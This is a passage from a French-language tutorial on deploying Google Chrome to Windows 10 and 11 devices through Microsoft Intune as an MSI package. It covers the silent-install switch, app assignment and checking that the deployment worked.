L'option "Ignorer la version de l'application" doit être définie sur "Oui" pour Google Chrome. Ainsi, on s'assure qu'Intune gérera correctement le fait que cette application bénéficie des mises à jour automatique. Sinon, le navigateur risque de se réinstaller "en boucle".
Enfin, pour l'option "Arguments de ligne de commande", nous devons préciser le commutateur permettant d'effectuer une installation silencieuse, soit "/quiet" pour Google Chrome.
Ce qui donne :
Cliquez sur "Suivant".
C. Affectations
Pour finir, affectez l'application Google Chrome aux appareils ou aux utilisateurs de votre choix, selon vos besoins. Comme pour les applications au format EXE, nous pouvons rendre cette application obligatoire, la proposer pour les appareils inscrits via le portail d'entreprise ou déclencher la désinstallation. Dans cet exemple, tous les appareils sont sélectionnés, car il s'agit d'un Lab.
Poursuivez jusqu'à la fin et finalisez la création de l'application.
D. Finaliser la création de l'application
Lorsque vous finalisez la création de l'application, le package MSI est chargé sur Microsoft Intune. Ceci peut prendre un peu de temps en fonction de votre débit et de la taille du package.
Il ne reste plus qu'à tester sur un appareil Windows.
IV. Tester le déploiement de l'application
Dans cet exemple, un appareil sous Windows 11 est utilisé pour vérifier le bon fonctionnement de la stratégie Intune. Après une synchronisation, l'application Google Chrome est bien visible sur l'appareil :
Du côté du portail Microsoft Intune, l'état du déploiement de l'application sur cet appareil remonte également :
V. Conclusion
Si vous suivez rigoureusement ce tutoriel, vous allez pouvoir déployer le navigateur Google Chrome sur les machines Windows 10 et Windows 11 de votre parc informatique qui sont inscrites dans Intune.
Connexion
Microsoft Office pour 1, 2 ou 5 ordinateurs, pour Windows ou Mac
